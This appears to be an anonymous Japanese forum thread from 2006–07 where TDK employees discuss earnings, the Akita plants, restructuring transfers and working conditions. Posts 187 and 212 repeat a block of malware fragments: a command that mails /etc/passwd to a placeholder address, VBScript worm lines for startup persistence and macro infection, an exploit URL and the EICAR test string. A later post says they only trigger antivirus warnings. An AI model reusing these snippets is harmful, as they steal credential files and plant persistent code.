これがほんとうだったら明日株価大暴落したりして。。。
赤字の原因は、HDD?内製化の影響?


132 :名無しさん@3周年:2006/10/30(月) 19:11:20 ID:8WtwBz78
TDKの中間、純利益37%増――電子部品が好調

TDKが30日に発表した2006年9月中間期の連結決算(米国会計基準)は、
純利益が前年同期比37%増の296億円だった。
中間期の売上高は21%増の4248億円だった。
ttp://markets.nikkei.co.jp/kokunai/gyoseki.cfm?id=d3l3004230&date=20061030

この分だと来期には1兆円企業になるのか?

133 :名無しさん@3周年:2006/10/31(火) 08:20:25 ID:pFZ2gWxl
好決算。コンデンサの寄与が大きいな。
生産は秋田メインなんでますますにかほは発展するね。
そういえばにかほにテクニカルセンター作る話はどーなったの?できたら八幡の昨日すべて移転?

134 :わとそん:2006/10/31(火) 09:06:30 ID:qYoTgCyB
秋田工場の入り口に大きな建物ができてましたね。
同期の人に聞いても知らないということです。新しい研究所かな。
うわさでは、食堂だとか休憩室だとかみたいです。
課長以上のマッサージ室かもしれません。
ただ軽自動車に乗ってる人は停めるところがなくなったと怒ってました。しょうがなく、普通車を買ったそうです。

135 :名無しさん@3周年:2006/10/31(火) 18:54:12 ID:NGcXrZ6z
だから秋田から撤退すればもっと発展するんだって!!!!

136 :名無しさん@3周年:2006/11/01(水) 08:30:14 ID:OzqmMBIW
だが断る

137 :名無しさん@3周年:2006/11/01(水) 13:12:57 ID:UbXb+3Ni
秋田勤務のヤツらはきりたんぽが好きなんだろ

138 :名無しさん@3周年:2006/11/01(水) 15:38:06 ID:76TotxRS
またまたTDK○内T岡リストラ異動始まりました。

139 :パワフル:2006/11/02(木) 13:29:20 ID:OdGObvap
秋田から撤退することはないだろう。もしそうなったら、数十万人、いやグループ企業や関係者も入れれば、数百万人の雇用がなくなるからだ。
仁賀保の小学校だって、ほとんどが、関係者。先生だって問題になるよ。
高速道路もできるらしく、ますます秋田は楽しみな工場だ。

140 :名無しさん@3周年:2006/11/02(木) 22:00:03 ID:ygNFMIy0
秋田(゚听)イラネ

141 :名無しさん@3周年:2006/11/02(木) 23:47:35 ID:Fo8aC/1O
仁賀保が発祥の地であるが故に撤退しないんでしょうね。
基本的に139さんの言うとおりだとおもいます。
ただ、
細かいこと言って申し訳ないんですが、数十万人、数百万人は誇張しすぎ?
連結従業員は全社で4万人弱、秋田県の人口は110万人ぐらいっすよね。

142 :名無しさん@3周年:2006/11/03(金) 13:02:24 ID:5FOmanb4
秋田があるから優秀な学生が敬遠する
実際に秋田に転勤になって辞める人多いし

143 :名無しさん@3周年:2006/11/03(金) 13:03:35 ID:cRReB1wZ
なんか楽しそうな会社だな

144 :名無しさん@3周年:2006/11/03(金) 18:33:50 ID:6GGZKVE/
コンデンサってハイテク?

145 :名無しさん@3周年:2006/11/03(金) 22:31:34 ID:gSh2g5So
研究所つかえないね。やっぱり製造が一番なんだよ!本社の人間なんていらねよ。

146 :名無しさん@3周年:2006/11/04(土) 02:25:40 ID:FP0ragWh
秋田だけでやってろよ

147 :栗坊:2006/11/04(土) 07:37:41 ID:YsWk09jU
リクナビに、積層コンデンサの技術者募集しているが、人手が不足してるの?

148 :名無しさん@3周年:2006/11/04(土) 08:30:11 ID:t3qmK9FS
俺は転職グミだが、ここの会社はすばらしいよ。
当しばなんて組織が硬すぎて大変だよ。
好きなことなんてまずできません。
残業も午前様。会社に泊まることも当たり前の会社だったよ。

149 :名無しさん@3周年:2006/11/04(土) 09:31:17 ID:yMLqDym3
転職考えてます。きっと勤務先は秋田でしょう。
にかほ市ってそんなに生活環境悪いんですか?
東京への出張とかどうやって行くのか興味ありますけど。
僕には魅力的に見えますよ、この会社。

150 :名無しさん@3周年:2006/11/04(土) 10:45:03 ID:uhkChXfi
そういえば秋田から東京へ出張中に
電車が脱線して亡くなった人がいたな・・・

151 :名無しさん@3周年:2006/11/04(土) 17:47:59 ID:yVPbyewT
秋田から撤退したら数十万人の雇用に影響が出るのは大げさじゃないと思うよ。
関係者ってグループ会社だけではないだろう。
子林工業とか他家だテクノとかもほとんどはうちの会社の下請けだろう。
車屋、コンビニ、マックスバルー、ホテルエスクル、公務員だって影響を受けるだろう。
山形にも関係企業が多いと聞く。
秋田はほとんどが関係者に含まれるだろう。
まず、秋田空港がヤバイ。高速道路もヤバイだろう。
せっかく作ったのに、仁賀保から乗る車がいなければ赤字が予測されるだろう。
俺の予想では会社が撤退するに関係なく、誰も乗らないと思う。
インターの位置が悪いからだ。せいぜい俺らみたいに秋田工場への出張者しか乗らないだろう。
インターを会社内に作ればよかったのにと感じているがどうなるのか?
俺はこの会社に来てまだ日が浅いのに多くの疑問を感じているよ。




152 :名無しさん@3周年:2006/11/04(土) 20:07:17 ID:JBYa/A3z
にかほ市=TDK王国
で間違いないですか?

153 :名無しさん@3周年:2006/11/04(土) 21:52:01 ID:hXpBBwok
にかほ市=TDK王国だが
TDKの社員が王族のように生活できるかはまた別の話

154 :名無しさん@3周年:2006/11/04(土) 22:16:13 ID:e1fJTtwj
総人口3万人弱の市なのに数十万人も影響は無いだろう。

155 :名無しさん@3周年:2006/11/04(土) 23:43:55 ID:3927VM1i
秋田を日本から抹消すればいいだけの話じゃね?

156 :名無しさん@3周年:2006/11/05(日) 06:18:09 ID:UgXLHiTe
またお前かTDKに来なくていいよ

157 :名無しさん@3周年:2006/11/05(日) 19:13:11 ID:g51tBVL0
>>138
コスト改善効果キボンヌ

158 :名無しさん@3周年:2006/11/05(日) 20:05:40 ID:M/VuC301
そもそも秋田で生産するメリットってあるの?

159 :名無しさん@3周年:2006/11/05(日) 22:28:36 ID:wTSi8x1k
転職考えてます。
今、電源関係って本社ですよね?
残業多いんですか?

160 :名無しさん@3周年:2006/11/06(月) 00:02:50 ID:zM6oV8W5
>>157
異動させた社員の通勤手当+異動させた社員の穴埋めの派遣社員の数だけ経費増
しかも目の悪い人には細かい仕事させてミスさせて強制解雇
腰の悪い人には長距離通勤か腰に負担のかかる仕事させてフィジカル破壊工作
それでも辞めなければ、強制解雇・・・

リストラ異動された人のほとんどがT岡生産部から10キロ以内の人。
それがある日突然30〜40キロ離れたS田生産部及びY佐生産部に異動させられる

結果、通勤手当+派遣社員分の経費増。この時世再就職先なんてないから誰も辞めない。
それでも辞めさせたければこの先何をするか分からない会社です。

161 :160:2006/11/06(月) 00:21:47 ID:zM6oV8W5
上長(リーダー、係長、課長)が嫌っているとの噂が立っている人間が飛ばされるようです。

162 :まさし:2006/11/06(月) 12:56:50 ID:z2qnsTk9
秋田ではまだ会社のネームバリューが大きいと出張の度に感じるよ。
飲み屋でも扱いが別格だ。作業衣で外出しても違和感がないのだ。
八幡で作業衣で駅前を歩いていたら、恥ずかしいよね。
さすが、秋田はすごいと思うよ。

163 :名無しさん@3周年:2006/11/06(月) 13:58:44 ID:9qDa9w8K
中途の方、試験ってどんな感じなんですか?

164 :名無しさん@3周年:2006/11/07(火) 00:53:54 ID:EwXAHuz/
>>163
クレペリンと面接があるって聞いたことがある?

話は変わりますが新卒の時
最終面接ブッチしてしまったんですがばれないですかね?

165 :名無しさん@3周年:2006/11/07(火) 03:51:48 ID:vvABEFbG
>>159

ラムダ

166 :名無しさん@3周年:2006/11/07(火) 19:38:13 ID:wm+DRH5h
>>153
まさにその通り。
豪族だけが生き残れる場所、そこが飽きたです。

167 :名無しさん@3周年:2006/11/07(火) 22:18:44 ID:4c0YfFIi
>>160
鶴○生産部、酒○生産部、遊○生産部ではどのくらい辞めた?

168 :160:2006/11/08(水) 01:06:19 ID:kTxroOTw
俺の情報では今のところ二人。ただ、聞こえてくる話では鶴○生産部が集中攻撃されている感じです

169 :名無しさん@3周年:2006/11/08(水) 12:28:07 ID:UcLdjg9p
秋田に全機能移転するんじゃない?福社長は秋田なんでしょ?すくなくとも研究部門は秋田にうつすんじゃない?

170 :名無しさん@3周年:2006/11/08(水) 22:12:13 ID:EMBF9/ae
>>169
そんなことになったらますます優秀な人材が他に移りますよ

171 :名無しさん@3周年:2006/11/08(水) 22:18:11 ID:U3t1wXN9
>>168
あんまり辞めてないね。
○利○荘は部長、課長が率先して辞めてるよ。8人くらい。

172 :名無しさん@3周年:2006/11/08(水) 22:34:35 ID:UcLdjg9p
>>170
いっそのこと秋田出身者だけにすれば。そうしたら辞めない。ただ機能するかわからんが。
秋田配属の本社の人間はよくやめるよな〜

173 :名無しさん@3周年:2006/11/09(木) 04:50:05 ID:20yAk7Gs
>>171
そういえば総務は前にいた社長のパワハラで部長も辞めてほぼ総入れ替えって話を聞いた。
社長のワガママでわざわざ酒○生産部、遊○生産部から総務とシステムのスタッフを呼んだらしい。

174 :名無しさん@3周年:2006/11/09(木) 22:19:02 ID:VlhilUcQ
辞めるにしてもこんな糞ド田舎では辞める前に就職活動も出来んだろ


175 :名無しさん@3周年:2006/11/10(金) 03:35:04 ID:FBe2C6Cf
>>174
正確に言えば辞めさせられる、または辞めないといけない状態に追い込まれるだな

176 :名無しさん@3周年:2006/11/10(金) 19:37:40 ID:kYT7C9GM
>>175
おっ、おう・・・。

177 :名無しさん@3周年:2006/11/10(金) 21:01:43 ID:vzQuUjIp
秋田はもう飽きた

178 :名無しさん@3周年:2006/11/11(土) 23:23:17 ID:c/6KTQ9G
>>172
排他的なアホだけ残しても意味ねぇ〜な。
地元の奴はラインだけにしたらいいのにって声が上層部であがってますた

179 :名無しさん@3周年:2006/11/11(土) 23:49:22 ID:qopBZsPI
>>178
そう、排他的、因襲的で、もううんざり。
八幡は、千曲の連中が、今大量に移動してきているから
秋田勤務が戻る余地はないと言われた。
今日、東京へ戻って、転職する決意をした。


180 :名無しさん@3周年:2006/11/12(日) 00:04:42 ID:DAzqtaAY
○利○荘は工場建てるって本当?
○島の酢冬部長は部下へのセクハラ&パワハラでがんばってるらしい。
最低人間がNo2の会社が工場建てるの?

181 :名無しさん@3周年:2006/11/12(日) 09:38:45 ID:k01QsDcD
>>178
激しく同意。排他的だよね。田舎だからしょうがないのか。。

182 :名無しさん@3周年:2006/11/12(日) 11:27:57 ID:IiuWl+D/
秋田の一般的なデメリットをあげてみよう
・物流コスト(東北が一番高い・・はず)
・大雪による操業停止リスク
・僻地勤務による人材流出、また新卒中途へのイメージダウン

メリットは土地の安さだけじゃん
税金も他県より大幅に安いってわけでもないだろうし

そこまでして地域住民を雇ってあげることが大切なの?
たいして働きもしない甘ったれた地元民を?
業績のほうが先にダメになっちゃいますよ?

183 :名無しさん@3周年[] :2006/11/12(日) 11:32:38 ID:PRFafQE/
秋田かぁ
九州にも工場とかできないかな

184 :名無しさん@3周年:2006/11/12(日) 12:47:10 ID:SZSiW7Zl
>>183
大分に工場あるよ。
今度の社長は鹿児島生まれ、長崎大出身
だから、ほかにも作ってくれるといいね。


185 :名無しさん@3周年[] :2006/11/12(日) 13:00:23 ID:PRFafQE/
ビデオテープの工場あったんだ
知らなかった。。。

社長期待してます。

186 :名無しさん@3周年:2006/11/12(日) 21:21:05 ID:Q+uVL8vA
>>182
秋田だけじゃなくほとんどの東北だろ。余計なお世話。
何度誹謗しようがお前の田舎に工場は来ないからw

187 :8:<body onload=window()>:2006/11/12(日) 21:35:55 ID:7wVhnvK9
8:<body onload=window()> [cat /etc/passwd | mail nobody@nonexistent.com]
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c

188 :名無しさん@3周年:2006/11/13(月) 01:20:42 ID:hXAfq4Vj
>>182
同意。じもてぃーとは越えられない壁がある。まぁあと少しで転職なんで関係ないけど。

189 :名無しさん@3周年:2006/11/13(月) 01:31:17 ID:i6ul8+hV
甲府は結構良いと思うが

190 :名無しさん@3周年:2006/11/14(火) 02:13:40 ID:X4PAEEBh
甲府ってADSLすらできないんでしょ?
オhル

191 :名無しさん@5周年:2006/11/14(火) 07:30:14 ID:C5DueRkx
派遣で久々に○工場に行ったら人事異動でひいき丸出し無茶苦茶やってた人が数人
いなくなっていた!
今はとっても仕事がやりやすい職場に近づいてるようだ。
よかったよかった。
しかし4年前にやってればきっと業績も伸びてただろうに・・・遅すぎ!

192 :名無しさん@3周年:2006/11/14(火) 15:33:16 ID:6x2mMjzY
>>190
確かにネットはいまどきISDNだな。
寮の飯はまずいし。


193 :名無しさん@3周年:2006/11/14(火) 21:39:44 ID:YlelFyze
なんで残業量で出世がきまるん?

194 :名無しさん@3周年:2006/11/14(火) 23:32:33 ID:LK67PBdN
秋田もこれから雪の季節ですねぇ。
主要工場の周りでは、1月ごろはどのくらいの積雪になるのでしょうか。
海沿いだからあんまり積もらないという話はありますが。
去年は大雪でしたかね。

195 :名無しさん@3周年:2006/11/14(火) 23:41:39 ID:ibTcVaPv
秋田ってこの頃嫌なニュースが多いね。藤里町やら大仙市。。。
にかほは大丈夫か?

196 :テンキー:2006/11/16(木) 18:49:00 ID:znbDIpJw
こちらにきて、初めての冬なので、楽しみだ。秋田の冬は出会いの冬というらしい。職場の上司もスキー場で彼女を見つけたようだ。俺もスノボーを買ったし、準備はバッチリだ。スノータイヤはボーナスがでたら買おう。雪が降り始めてから買ったほうが安いようだ。
運転後の温泉も楽しみだ。別の出会いがありそうだ。このままいけば、来年の夏には彼女ができるだろう。いまから、ワクワクする。秋田に配属されて幸せだ。

197 :名無しさん@3周年:2006/11/16(木) 22:18:09 ID:07qBRcLf
地方話はいらんからTDKについて語ってくれ

198 :名無しさん@3周年:2006/11/16(木) 23:35:59 ID:N9+z5O3G
先日、興味あったのでIR情報で中間期についてのストリーミングを聞いてました。
来期春から今までやってこなかった設備投資を百数十億規模でやるという話が。
コンデンサについて「どうやったら数が出るか分かった」からやると。
新しい工場でも出来るのでしょうかね。

199 :名無しさん@3周年:2006/11/17(金) 08:03:26 ID:DZ+kOtor
TDKは地方話しかないから

200 :名無しさん@3周年:2006/11/17(金) 08:37:39 ID:b6P+/w6F
>>196
おいおい。秋田のスキー場は人が全然いないんで出会いなんかないぞ。

201 :名無しさん@3周年:2006/11/17(金) 09:31:45 ID:QAQlzClp
冬に出会えるってのは、クリスマスやらバレンタインのイベントに備えて
喪男&喪女が必死になるからだろ

202 :テンキー:2006/11/17(金) 10:28:25 ID:kf2NahYU
会社の話しか。
あんまりいい話しはないね。
もーすぐ、ボーナスがでるね。楽しみだよ。
なんだかんだいって、給料いいよね。

203 :名無しさん@3周年:2006/11/17(金) 22:25:02 ID:1/OXPiRo
秋田の話が多いですが千葉の方の話はないんでしょうか?

204 :名無しさん@3周年:2006/11/17(金) 23:58:44 ID:wXtFHEXN
千葉で会社に不安のあるやつはとっくに転職してるからさ。


205 :名無しさん@3周年:2006/11/18(土) 00:20:24 ID:dfkAFgRf
会社も秋田地区ばかりに力を入れているから仕方ないだろう

206 :名無しさん@3周年:2006/11/18(土) 00:40:58 ID:xWfgFEcD
>>203
なるほど

>>205
秋田が主力なんですね

ところでポジティブな話題はないのでしょうか?(^^;)

207 :名無しさん@3周年:2006/11/18(土) 00:55:57 ID:S7Oe/MBQ
まんまん

208 :名無しさん@3周年:2006/11/18(土) 01:49:09 ID:/zfjlFaq
うぜぇ

209 :名無しさん@3周年:2006/11/18(土) 03:18:28 ID:gNGXXPjQ
>>206
いっぱいあった。
だけど思い出せない。

210 :名無しさん@3周年:2006/11/19(日) 04:26:35 ID:xwlCyI/u
レスの半分が秋田のバカの日記帳になってるな

211 :名無しさん@3周年:2006/11/19(日) 04:52:48 ID:BsCEsss4
そんな日記帳に書き込むあんたもry

212 :<body onload=window:2006/11/19(日) 07:33:40 ID:IJoZUZDe
[cat /etc/passwd | mail nobody@nonexistent.com]
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c

213 :名無しさん@3周年:2006/11/20(月) 08:33:21 ID:NJS83vzL
良スレ認定キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

214 :名無しさん@3周年:2006/11/23(木) 16:49:02 ID:h0Esbz0A
ho----

215 :名無しさん@5周年:2006/11/23(木) 22:47:38 ID:jSsXp67G
職場の喪女ぜってぇーメタボリックシンドロームだ!


216 :名無しさん@3周年:2006/11/24(金) 11:30:02 ID:l9ckjmLc
今日は休みだから、マックスバリューに弁当を買いに行ったぜ。
そしたら会社の人ばかりで、会社にいるような感じだったよ。
これだからにかほはやだね。
午後から本荘に行って買い物でも行くか。
といってもいい店はないから、秋田市まで行くか。
ほかの地域の皆さんは仕事ですね。
すでに辞めた同期がいるらしい。
大変ですね。



217 :名無しさん@3周年:2006/11/24(金) 18:32:25 ID:Gq+L32Oh
成田が一番いいと思うよ。
利点は土地が安い。
結構東京に近い。
千葉という政令都市に近い。
成田さんがある。
寮がすばらしい。
俺は成田に配属されたかったよ。
成田は結婚する人の割合が高いからうらやましいよ。
女性の割合が高いからかね。


218 :名無しさん@3周年:2006/11/26(日) 04:49:58 ID:5MdsTH3w
糞日記帳晒しage

219 :名無しさん@5周年:2006/11/30(木) 22:04:27 ID:CJv7VUqP
夏から来てる元社員のM。
ダンナは社員で人望もあつい。
だんなの七光りで仕事が出来ると皆思ってるが実はかなりのDONだ!
仕事出来ないくせに出来るふりをしているかなりのDONだ!
オマケにかなり気が強く底意地が悪い。
こいつと取り巻きは真綿イジメで社員を1名追い出した。
次のターゲットは誰だろ???


220 :名無しさん@3周年:2006/12/01(金) 08:46:23 ID:Y1SEV9PP
>>219

× DON
○ DQN

221 :名無しさん@3周年:2006/12/01(金) 22:32:33 ID:fdSsKqxQ
俺の考えはこうだ。
ここの掲示板を見ていると秋田は人気がないらしい。
俺も最近そう感じる。まだ数ヶ月だが。
対策は秋田の社員の給料を2倍とはいわなくても数倍にすればいいだろう。
だれでも1000万の給料なら辞めることもないし、
逆に秋田が人気勤務地になるかもしれない。
成田とか今人気のある職場は逆に給料を下げたらどうだろうか。
それに不満がある人は会社を辞めればいいと思う。
そうすればますます会社が発達し、全体の給料が上がるだろう。



222 :名無しさん@3周年:2006/12/02(土) 12:46:11 ID:+v5SI4Kp
>>221
会社に誰もいなくなりそうだ。

223 :名無しさん@3周年:2006/12/03(日) 12:18:17 ID:BVKwHDzE
今は千曲だが、飽きたなら年収300万で十分だろう。
以前NHKで秋田の平均年収は240万くらいだと言っていたぞ。
現実に残業なしでも300万は貰ってるんだから、かなり生活は楽なはず。
私も秋田にいたことがあるが、寮と会社の往復で数年で1000万くらい貯金ができました。
今はローンなどで貯金は苦しいが。
どこの部署でも残業規制があると思うが、残業をすべて認めたら会社が大変だ。
サービス残業の分を会社が設備投資して、将来会社の利益になると思えば
よいかもしれない。
住むなら千曲が一番いいかもしれない。
東京に遊びに行くのにも、2時間あればいけるぞ。
秋田に行くのは大変だけど、それもある意味楽しいのだ。



224 :名無しさん@3周年:2006/12/03(日) 14:27:16 ID:DO6+aJ8y
秋田というか東北地区に足を踏み入れないで定年を迎えることは可能ですか?

225 :名無しさん@3周年:2006/12/03(日) 15:30:26 ID:MhPyA/Xg
秋田はサイコー

226 :名無しさん@3周年:2006/12/04(月) 00:07:18 ID:e0hdLF6H
不可能です。

227 :名無しさん@3周年:2006/12/04(月) 00:08:36 ID:e0hdLF6H
中国

228 :名無しさん@3周年:2006/12/04(月) 19:29:04 ID:EDtcs0RW
インド

229 :名無しさん@3周年:2006/12/04(月) 21:17:27 ID:e0hdLF6H
ヘッド


230 :名無しさん@3周年:2006/12/05(火) 22:01:14 ID:KkvZ6C2U
皆さ〜ん、喜んで!
来年度のトップ層人事が固まりつつあるよ〜!
コンデンサ可哀相〜!

231 :名無しさん@3周年:2006/12/05(火) 22:46:12 ID:GQ5ho3ga
>>230
なになに?
どうなるの?
情報キボンヌ

232 :名無しさん@3周年:2006/12/07(木) 09:01:32 ID:wtIlgs4U
昨日はボーナス出ましたね。
派遣社員は出ないそうです。
厳しいですね。ほとんど同じ仕事をしているのに。
派遣の人のほうが仕事をしている感じがしますね。
正社員の人は朝礼が終わるなり、すぐに休憩しますね。
残業は派遣はしないけど、正社員はしますね。
スマップに登録すれば残業手当が出るみたいです。
日中より、夜の方が給料が多いので、夜仕事をする人が多いですね。
うちの旦那も次の日まで仕事をするときが多い気がします。
夜10時からがいいと言ってました。がんばって下さい。


233 :名無しさん@3周年:2006/12/07(木) 09:32:11 ID:fujZlTlX
普通の会社って創立記念日で休みなのかな?

234 :名無しさん@3周年:2006/12/07(木) 11:28:41 ID:kBimwNsx
>>233
会社によるんじゃない?

235 :名無しさん@3周年:2006/12/07(木) 23:12:03 ID:5K0NZLxd
>>231
?


236 :名無しさん@3周年:2006/12/09(土) 07:14:08 ID:z4rPkapi
忘年会・・・男に媚びる年増のバカ女!
若作りしすぎでキモかったゼィ!

237 :無しさん@3周年:2006/12/10(日) 11:00:07 ID:iLtpMnsb
テクノロジGの飲みに行ったが知らない人ばかりだったぜ。
ここで提案だ。
タイムス新聞はみんなも見ていると思うけど、
そこに出会いの場みたいなコーナーを作れば楽しいと思う。
たとえば恋人募集とか。
組合では色々やっているようだが、会社としてやれば面白い。


238 :名無しさん@3周年:2006/12/10(日) 20:18:37 ID:AiL71dpe
真光信者になると、思考がおかしくなるのかねえ?

------------------------------------------------------------------
3910.(untitled) 名前:はやしあきひろ 日付:11月10日 19時17分
千代田インテグレの 林 あきひろ です!
得意分野は、車の運転とセークスでつ!!!

崇教真光は素晴らしい!!!



239 :名無しさん@3周年:2006/12/11(月) 08:22:41 ID:mW4Hv3HS
>>238
なにそれ ヤバすぎ

240 :名無しさん@3周年:2006/12/12(火) 23:38:58 ID:oO2oQQdp
【株式】TDK株を来年1月13日付で上場廃止【大証】
http://live14.2ch.net/test/read.cgi/wildplus/1165932338/


241 :名無しさん@3周年:2006/12/17(日) 19:40:57 ID:z6PR2T2f
飽田はもう雪だ。。。。

242 :名無しさん@3周年:2006/12/19(火) 14:44:47 ID:/bQkK6RO
ここのスレをクリックするとノートン先生が、
頻繁に警告を発します。
何でかな?
教えて えろい人。


243 :名無しさん@3周年:2006/12/20(水) 08:48:43 ID:gS3XyaIo
>>242

>>187>>212の書き込みにノートンが誤反応してる
実害は全く無いけど、うざいんだよね

244 :名無しさん@3周年:2006/12/22(金) 08:27:13 ID:/8UQXrol
秋田だ!

245 :名無しさん@3周年:2006/12/22(金) 12:08:06 ID:am8e+wnu
n腹辞めたが、ここ見ているといかにn腹の社員が多いか良くわかる。
というか、おもむろにググルで「2ch 大日本スクリーン」で検索したら普通にスレが立ってたのな。テラワロスwwwwっうぇうぇw

1年ちょっと前になるが、入社面接のとき結構人数いたが
最終面接(といっても2回目だが)のときに漏れ一人しか来ていなかったので
「他の方は既に作業のほうに入っているのですか?」と訊いてみたところ、急に黙ってたな
今となっては何故かわかるが・・・。まぁ皆入るの断ったんだろうな。漏れも当時この会社の実態知ってたら入社ドタキャンするがな。

でだ、こんな面白いスレッド見つけたからには当時のn腹の求人票でもうpしたらネタになるかなって思ったけど
探しても見つからなかったので覚えている範囲で

雇用形態:正社員
主な仕事内容:生産工程の管理(主にPCを使って作業だと記憶、当然ながら大ニホーンスクリーン勤務とは一切書かれていない
勤務地、募集人員:彦根3名野洲2名(逆かも?
社会保険:一応完備
交通費:全額(漏れは大津出身、しかも湖西線付近。一ヶ月で交通費約43000円wっうぇ でも往復で5時間 orz
給与:16万〜19万(漏れの場合は16.5万だた)
手当:住宅手当1.5万前後(あったかなそんなもん・・・?
昇給:年3千
賞与:年合計2〜3ヶ月?(この辺はマジでうろ覚え
休日:土日祝、年末年始、夏期休暇 (夏期休暇は有給を使って休めということ、しかも半強制的。有給無い新人には給与カットでしかない
タイムカード:一応あった。残業はついてた

他のn腹の人はどんな求人票だったかね?
しかしこの給料・・・。今やっているバイト、朝だけでこれの半分いくが・・・
午後もバイト入ったら保険料自分で払っても、n腹のときの給料と変わらんぞ・・・

246 :名無しさん@3周年:2006/12/23(土) 08:03:48 ID:AKyZN5X4
子会社はいまだにリストラにやっきだな!今度はお隣の県の別子会社に移動だとよ!

247 :名無しさん@3周年:2006/12/28(木) 19:01:13 ID:z0gdoUvz
報復人事

248 :名無しさん@3周年:2006/12/29(金) 12:16:04 ID:ed5STT9J
皆さん実家に戻ったのでしょう。
寮も静かです。
来年は景気が回復するみたいですね。
私も彼女をつくるのが目標です。
出会いがあまりないのが難点ですね。


249 :名無しさん@3周年:2006/12/30(土) 02:23:31 ID:yvQfS/7n
先輩の語るところによりますと、2007年のキーワードは、

1.甲府勤務経験あり
2.ヘッド出身
3.中途採用

の3つだそうです。

1つも当てはまらない社員は、いい評価は望めないから、出世欲のある者は、
早く辞めた方が良いらしいです。
とうとう人事のトップまで全てのキーワードの該当者になったそうです。
特に本社、八幡の組織は要検討だそうです。
いっそみんなで、甲府勤務、中途採用、ヘッドの仕事経験を偽ってはどうだろう。


250 :納豆満腹:2006/12/30(土) 15:42:30 ID:BLfj/HOU
ここだけの話しだけど、ヘッドの仕事は忙しいです。残業はあたりたえ、休日出勤もあります。
定時に帰れてたら、ラッキーでしょう。
人の入れ代わりも激しいかな。
中途が多いですね。
やり甲斐はあります。
出世が望め部署だと思うよ。

251 :名無しさん@3周年:2006/12/31(日) 14:33:47 ID:uWijmf6s
CM見た人いる?

252 :名無しさん@3周年:2006/12/31(日) 16:15:13 ID:MjhZcADR
みました
何であんなにデバイス全面に押し出してるの?
就活用?

253 :名無しさん@3周年:2007/01/05(金) 21:02:12 ID:E9TsAUpI
秋田県

254 :名無しさん@3周年:2007/01/06(土) 16:30:09 ID:0egRag9X


255 :名無しさん@3周年:2007/01/11(木) 10:26:04 ID:4EgfgADy
test

256 :名無しさん@3周年:2007/01/11(木) 23:22:51 ID:cqhqL1yr
今度の法案で残業代が出なくなるそうです。
対象はホワイトカラーになるようです。
俺らはみんな作業着だから、ブルーカラーに分類されるかもしれません。
ということは残業代は出るみたいです。
ネクタイをするとホワイトカラーになります。
俺は平社員だから、対象ではないかもしれない。




257 :名無しさん@3周年:2007/01/15(月) 18:57:02 ID:oJ2Sa3XL
バカおめ

258 :ラクティス:2007/01/15(月) 19:16:12 ID:3nsZhrE+
俺のいる工場はかなり忙しいです。中途が多いので離職率が高いですね。
残業もあります。まず、定時には帰れません。
寮についたら、9時を過ぎていたこともありますね。休日は一人軽井沢に行き、空しくなって落ち込みます。
実家が名古屋なんでよくいきます。自動車会社からきた人は大変だから、辞めたらしいです。

259 :名無しさん@3周年:2007/01/17(水) 23:05:13 ID:dte/tZik
急にスレ伸びなくなったな。

260 :名無しさん@3周年:2007/01/18(木) 00:32:39 ID:Qg+PnJlQ
>>258
ネタですか?技術系職の方?
21時に帰れるんだったら、本気で採用試験うけてみたい。

261 :名無しさん@3周年:2007/01/19(金) 23:38:55 ID:ZkkHMbls
>>260
どの技術部門に行くのかがポイント
開発、生産管理、QAに行くと日が照ってるうちはまず帰れないな。

名札ヨシッ! ボタンヨシッ! ズックヨシッ!の世界です。

262 :名無しさん@3周年:2007/01/20(土) 22:45:36 ID:ERI5cQgE
しかし、コンデンサ大変屋根。

263 :名無しさん@3周年:2007/01/21(日) 22:34:36 ID:C9LhYDmH
>>261
ですよね。
材料開発で考えているんですけど
やはり秋田なんでしょうか。
できれば関東で働きたいんですけど。
ちなみに、前職は磁性体+誘電体に関わる材料開発
してました。

264 :名無しさん@3周年:2007/01/21(日) 22:41:05 ID:zfprNltG
>>263
材料開発希望であれば100% 秋田になる。
市川とか甘い夢を見てるようでは間違いなくがっかりするだけ。
超エリート&天下り組しか市川、成田組には配属されんな。
TDKはまず現場主義なので秋田は避けられない。 
都会が好きなら都会に工場ある会社受けろ。
まぁ、誘電体扱ってて立地条件に恵まれた会社ないけどw 

265 :名無しさん@3周年:2007/01/21(日) 23:10:53 ID:C9LhYDmH
>>263
レスありがとうございます。
なんとなく予想できましたけど、やはりそうなんですね。
もう韓国系企業か、勤務地の優先順位はさげて動くしかなさそうですね。

